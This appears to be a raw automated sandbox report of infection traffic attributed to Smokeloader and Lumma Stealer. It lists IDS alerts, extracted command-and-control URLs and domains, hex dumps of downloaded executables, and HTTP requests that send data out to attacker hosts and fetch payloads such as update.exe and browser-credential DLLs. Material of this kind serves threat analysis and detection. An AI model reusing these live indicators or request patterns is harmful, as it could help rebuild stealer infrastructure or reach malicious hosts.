Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49709 -> 190.13.174.94:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49710 -> 190.13.174.94:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49711 -> 190.13.174.94:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49712 -> 190.13.174.94:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53061 -> 190.13.174.94:80
Source: Traffic Snort IDS: 2052787 ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) 192.168.2.8:51397 -> 1.1.1.1:53
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53069 -> 109.175.29.39:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53070 -> 109.175.29.39:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53072 -> 109.175.29.39:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53073 -> 109.175.29.39:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53079 -> 109.175.29.39:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53080 -> 109.175.29.39:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53083 -> 109.175.29.39:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53084 -> 109.175.29.39:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53115 -> 109.175.29.39:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53116 -> 109.175.29.39:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53117 -> 109.175.29.39:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53118 -> 109.175.29.39:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53119 -> 109.175.29.39:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53120 -> 109.175.29.39:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53121 -> 109.175.29.39:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53122 -> 109.175.29.39:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53123 -> 109.175.29.39:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53124 -> 190.147.128.172:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53125 -> 190.147.128.172:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53126 -> 190.147.128.172:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53127 -> 190.147.128.172:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53128 -> 190.147.128.172:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53129 -> 190.147.128.172:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53130 -> 190.147.128.172:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53131 -> 190.147.128.172:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53132 -> 190.147.128.172:80
Source: C:\Windows\explorer.exe Network Connect: 109.175.29.39 80
Source: C:\Windows\explorer.exe Network Connect: 190.13.174.94 80
Source: C:\Windows\explorer.exe Network Connect: 91.202.233.231 80
Source: C:\Windows\explorer.exe Network Connect: 23.145.40.124 80
Source: C:\Windows\explorer.exe Network Connect: 190.147.128.172 80
Source: C:\Windows\explorer.exe Network Connect: 45.129.96.86 80
Source: Malware configuration extractor URLs: boredimperissvieos.shop
Source: Malware configuration extractor URLs: holicisticscrarws.shop
Source: Malware configuration extractor URLs: sweetsquarediaslw.shop
Source: Malware configuration extractor URLs: plaintediousidowsko.shop
Source: Malware configuration extractor URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor URLs: zippyfinickysofwps.shop
Source: Malware configuration extractor URLs: obsceneclassyjuwks.shop
Source: Malware configuration extractor URLs: acceptabledcooeprs.shop
Source: Malware configuration extractor URLs: whispedwoodmoodsksl.shop
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199689717899
Source: Malware configuration extractor URLs: http://dbfhns.in/tmp/index.php
Source: Malware configuration extractor URLs: http://guteyr.cc/tmp/index.php
Source: Malware configuration extractor URLs: http://greendag.ru/tmp/index.php
Source: Malware configuration extractor URLs: http://lobulraualov.in.net/tmp/index.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Mon, 27 May 2024 13:23:34 GMTContent-Type: application/octet-streamContent-Length: 325120Last-Modified: Mon, 27 May 2024 13:20:02 GMTConnection: keep-aliveETag: "66548882-4f600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 5b 37 b0 84 3a 59 e3 84 3a 59 e3 84 3a 59 e3 89 68 86 e3 98 3a 59 e3 89 68 b9 e3 09 3a 59 e3 89 68 b8 e3 aa 3a 59 e3 8d 42 ca e3 8d 3a 59 e3 84 3a 58 e3 e7 3a 59 e3 31 a4 bc e3 85 3a 59 e3 89 68 82 e3 85 3a 59 e3 31 a4 87 e3 85 3a 59 e3 52 69 63 68 84 3a 59 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e 81 f9 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 0c 01 00 00 74 08 00 00 00 00 00 86 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 09 00 00 04 00 00 70 bc 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 83 01 00 64 00 00 00 00 e0 08 00 08 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 84 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 78 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 33 0b 01 00 00 10 00 00 00 0c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 6c 00 00 00 20 01 00 00 6e 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 
2e 64 61 74 61 00 00 00 08 46 07 00 00 90 01 00 00 ce 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 a8 00 00 00 e0 08 00 00 aa 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 May 2024 13:24:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 27 May 2024 13:22:08 GMTETag: "1e5000-6196f67744000"Accept-Ranges: bytesContent-Length: 1986560Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 40 07 00 00 0c 17 00 00 00 00 00 e0 4d 07 00 00 10 00 00 00 50 07 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 1e 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 84 21 00 00 00 90 08 00 00 26 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 74 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 48 3e 07 00 00 10 00 00 00 40 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 
44 29 00 00 00 50 07 00 00 2a 00 00 00 44 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 f9 11 00 00 00 80 07 00 00 00 00 00 00 6e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 84 21 00 00 00 a0 07 00 00 22 00 00 00 6e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 14 00 00 00 00 d0 07 00 00 00 00 00 00 90 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 90 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 74 96 00 00 00 f0 07 00 00 98 00 00 00 92 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 26 16 00 00 90 08 00 00 26 16 00 00 2a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 1e 00 00 00 00 00 00 50 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 23.145.40.124
Source: Joe Sandbox View IP Address: 109.175.29.39
Source: Joe Sandbox View ASN Name: SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View ASN Name: TelmexColombiaSACO
Source: Joe Sandbox View ASN Name: BIHNETBIHNETAutonomusSystemBA
Source: Joe Sandbox View ASN Name: AKAMAI-ASUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12841Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15070Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20237Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5435Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1206Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569527Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBFCAEBFIJJKFHDAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIIJJDHDGCGDHIJDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEGCFBGDHJJJJJKJECFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 5329Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKJJECAEGCBGDHDHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 1081Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBGCAFIIECBFIDHIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEHIDHDAKJDHJKEBFIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCAAEHJDBKJJKFHJEBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 113601Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://spqqefesecvvfpt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dxgcikcstvjhw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://deiljvysjqajyam.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tgeabjhcrwocia.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hfipxhiwprpsvl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mdyttvvsjifyxv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: dbfhns.in
Source: global traffic HTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://faqldvcxoayalcyp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nspuoowkrfsuk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gcvwrsnytusejtdk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jebcasiwwjgorbsq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: dbfhns.in
Source: global traffic HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
Source: global traffic HTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bshlmattfttfdb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bngikvknmtdpor.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: dbfhns.in
Source: global traffic HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://amkihwobrgvem.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: dbfhns.in
